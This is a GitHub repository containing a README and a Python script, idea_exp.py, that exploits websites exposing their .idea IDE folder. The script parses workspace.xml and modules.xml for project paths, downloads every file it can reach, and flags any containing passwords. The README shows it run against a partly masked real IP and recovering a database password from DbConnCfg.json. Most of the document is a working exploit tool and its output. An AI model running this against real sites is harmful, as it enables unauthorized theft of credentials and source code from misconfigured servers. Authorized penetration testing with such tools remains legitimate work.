├── README.md
├── idea_exp.py
└── images
    ├── contain_password.png
    └── scanner_pannel.png


/README.md:
--------------------------------------------------------------------------------
 1 | # **.idea disclosure exploit**
 2 | 
 3 | A script use **.idea** folder to gather sensitive information for pentesters .
 4 | 
 5 | Websites not correctly deployed let their IDE config folder (**.idea**) exposed to hacker, 
 6 | 
 7 | which can lead password or archived data files leaked.
 8 | 
 9 | The scanner will try to download all files, please recheck local files by yourself.
10 | 
11 | ## Requirements
12 | 
13 | ```
14 | pip install lxml requests
15 | ```
16 | 
17 | ## Requirements
18 | 
19 | * 2022-08-05: Bug Fix and python3 support
20 | 
21 | ## Example
22 | 
23 | Our scanner reported a vulnerability this afternoon
24 | 
25 | ![scanner_pannel](images/scanner_pannel.png)
26 | 
27 | As you can see,  the file **DbConnCfg.json** leaked db password.
28 | 
29 | ```
30 | D:\IQIYI.codebase\idea_exp>idea_exp.py http://107.{mask}.{mask}.151/
31 | [+] Module name is {mask}
32 | [+] Type is web_module
33 | [+] About 67 urls to process
34 | [200] /cfg/DbConnCfg.json
35 | [200] /bi/applepay/comm.php
36 | [200] /bi/applepay/ipn_ios.php
37 | [404] /auth/auth_ios/auth_guest.php
38 | ...
39 | [200] /ver/ver_util.php
40 | All files saved to 107.{mask}.{mask}.151/idea_exp_report.html
41 | ```
42 | 
43 | ![contain_password](images/contain_password.png)


--------------------------------------------------------------------------------
/idea_exp.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | # -*- encoding: utf-8 -*-
  3 | 
  4 | from __future__ import print_function
  5 | import sys
  6 | import os
  7 | import shutil
  8 | import requests
  9 | try:
 10 |     import urllib.parse as urlparse
 11 | except Exception as e:
 12 |     import urlparse
 13 | import re
 14 | import webbrowser
 15 | from lxml import etree
 16 | from string import Template
 17 | 
 18 | 
 19 | HTML_TPL = """
 20 | <html>
 21 | <head>
 22 | <title>idea_exp scan report</title>
 23 | <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 24 | <style>
 25 |     body {width:960px; margin:auto; margin-top:40px; background:rgb(240,240,240);}
 26 |     p {color: #666;}
 27 |     h2 {color:#002E8C; font-size: 1em; padding-top:5px;}
 28 |     ul li {
 29 |     # word-wrap: break-word;
 30 |     # white-space: -moz-pre-wrap;
 31 |     # white-space: pre-wrap;
 32 |     margin-bottom:10px;
 33 |     }
 34 |     span {color: red;}
 35 |     origin_link {margin-left:10px;}
 36 | </style>
 37 | </head>
 38 | <body>
 39 | <h2>${start_url}</h2>
 40 | <ul>
 41 | ${url_list}
 42 | </ul>
 43 | </body>
 44 | </html>
 45 | """
 46 | 
 47 | 
 48 | HTML_LI_TPL = """
 49 |  <li>
 50 |  ${tips} <a href="${local_file}" target="_blank">${title}${path}</a> 
 51 |  <a href="${path}" target="_blank" style="margin-left:10px;" title="origin link">-></a>
 52 |  </li>
 53 | """
 54 | 
 55 | 
 56 | class Scanner(object):
 57 |     def __init__(self, url):
 58 |         self.start_url = url
 59 |         self.session = requests.Session()
 60 |         self.session.verify = False
 61 |         self.module_name = ''
 62 |         self.module_type = ''
 63 |         self.path_lst = []
 64 |         self.results = []
 65 |         self.get_module_name()
 66 |         self.parse_workspace()
 67 | 
 68 |     def get_module_name(self):
 69 |         try:
 70 |             url = self.start_url + 'modules.xml'
 71 |             text = self.session.get(url, timeout=20).text
 72 |             if text.find('ProjectModuleManager') < 0:
 73 |                 return
 74 |             root = etree.XML(text.encode('utf-8'))
 75 |             module = root.find('component').find('modules').find('module')
 76 |             file_url = module.get('fileurl')
 77 |             if not file_url:
 78 |                 file_url = module.get('filepath')
 79 |             self.module_name = os.path.basename(file_url)
 80 |             if self.module_name:
 81 |                 print('[+] Module name is', self.module_name[:-4])
 82 |                 self.get_module_type()
 83 |         except Exception as e:
 84 |             pass
 85 | 
 86 |     def get_module_type(self):
 87 |         try:
 88 |             url = self.start_url + self.module_name
 89 |             text = self.session.get(url, timeout=20).text
 90 |             root = etree.XML(text.encode('utf-8'))
 91 |             self.module_type = root.get('type').lower()
 92 |             print('[+] Type is', self.module_type)
 93 |         except Exception as e:
 94 |             pass
 95 | 
 96 |     def parse_workspace(self):
 97 |         try:
 98 |             url = self.start_url + 'workspace.xml'
 99 |             text = self.session.get(url, timeout=20).text
100 |             if text.find('<component name="') < 0:
101 |                 print('[ERROR] Incorrect doc: workspace.xml')
102 |                 exit(-1)
103 |             root = etree.XML(text.encode('utf-8'))
104 |             for e in root.iter():
105 |                 if e.text and e.text.strip().find('$PROJECT_DIR$') >= 0:
106 |                     path = e.text.strip()
107 |                     path = path[path.find('$PROJECT_DIR$')+13:]
108 |                     if path not in self.path_lst:
109 |                         self.path_lst.append(path)
110 |                 for key in e.attrib:
111 |                     if e.attrib[key].find('$PROJECT_DIR$') >= 0:
112 |                         path = e.attrib[key]
113 |                         path = path[path.find('$PROJECT_DIR$') + 13:]
114 |                         if path and path not in self.path_lst:
115 |                             self.path_lst.append(path)
116 |             if self.path_lst:
117 |                 print('[+] About %s urls to process' % len(self.path_lst))
118 |                 self.download()
119 |             else:
120 |                 print('All done, no files found.')
121 |         except (requests.exceptions.ConnectTimeout, requests.exceptions.ConnectionError) as e:
122 |             print('[ERROR] Fail to download %s' % url)
123 |         except Exception as e:
124 |             print('[ERROR] %s' % str(e))
125 |             exit(-1)
126 | 
127 |     def is_valid_name(self, entry_name):
128 |         if entry_name.find('..') >= 0 or \
129 |                 entry_name.startswith('\\') or \
130 |                 not os.path.abspath(os.path.join(self.save_folder, entry_name)).startswith(self.dest_dir):
131 |             try:
132 |                 print('[ERROR] Invalid entry name: %s' % entry_name)
133 |             except Exception as e:
134 |                 pass
135 |             return False
136 |         return True
137 | 
138 |     def download(self):
139 |         self.save_folder = save_folder = urlparse.urlparse(self.start_url, 'http').netloc.replace(':', '_')
140 |         self.dest_dir = os.path.abspath(save_folder)
141 |         if os.path.exists(save_folder):
142 |             shutil.rmtree(save_folder)
143 |         os.mkdir(save_folder)
144 |         self.start_url = self.start_url[:-6].rstrip('/')
145 |         for path in self.path_lst:
146 |             file_name = path.lstrip('/')
147 |             for c in r'*"/\[]:;|=,':
148 |                 file_name = file_name.replace(c, ' - ')
149 |             r = self.session.get(self.start_url + path, stream=True)
150 |             if r.status_code == 200 and self.is_valid_name(file_name):
151 |                 ret = {'tips': '', 'path': self.start_url + path, 'local_file': file_name, 'title': ''}
152 | 
153 |                 out_file = None
154 |                 for chunk in r.iter_content(chunk_size=8192):
155 |                     if not out_file:
156 |                         out_file = open(save_folder + '/' + file_name, 'wb')
157 |                     out_file.write(chunk)
158 |                     m = re.search(b'<title>(.*?)</title>', chunk)
159 |                     if m:
160 |                         ret['title'] = '[%s] ' % m.group(1).decode('utf-8')
161 |                     if chunk.lower().find(b'passw') > 0:
162 |                         ret['tips'] = '<span><b>(Contain Password)</b></span>'
163 |                 if out_file:
164 |                     out_file.close()
165 |                     self.results.append(ret)
166 |             print('[%s] %s' % (r.status_code, path))
167 | 
168 |         if self.results:
169 |             tpl_html = Template(HTML_TPL)
170 |             tpl_li = Template(HTML_LI_TPL)
171 |             str_li = ''
172 |             for r in self.results:
173 |                 str_li += tpl_li.substitute(r)
174 |             with open(save_folder + '/idea_exp_report.html', 'wb') as f:
175 |                 f.write(tpl_html.substitute({'start_url': self.start_url, 'url_list': str_li}).encode('utf-8'))
176 |             print('All files saved to ' + save_folder + '/idea_exp_report.html')
177 |             webbrowser.open_new_tab(os.path.abspath(save_folder + '/idea_exp_report.html'))
178 | 
179 | 
180 | if __name__ == '__main__':
181 |     if len(sys.argv) < 2:
182 |         print("""idea_exp v1.0 (https://github.com/lijiejie/idea_exploit)
183 |         
184 | Gather sensitive information from (.idea) folder for pentesters. Usage:
185 |   
186 | python idea_exp.py http://example.com/.idea/
187 |   """)
188 |         exit(0)
189 |     url = sys.argv[1]
190 |     if not url.lower().startswith('http'):
191 |         url = 'http://' + url
192 |     if url.rfind('.idea') > 0:
193 |         url = url[:url.rfind('.idea')] + '.idea/'
194 |     else:
195 |         url = url.rstrip('/') + '/.idea/'
196 | 
197 |     s = Scanner(url)
198 | 


--------------------------------------------------------------------------------
/images/contain_password.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lijiejie/idea_exploit/4ffce5d39139b929ba246f427a10e2198f0d03d2/images/contain_password.png


--------------------------------------------------------------------------------
/images/scanner_pannel.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lijiejie/idea_exploit/4ffce5d39139b929ba246f427a10e2198f0d03d2/images/scanner_pannel.png


--------------------------------------------------------------------------------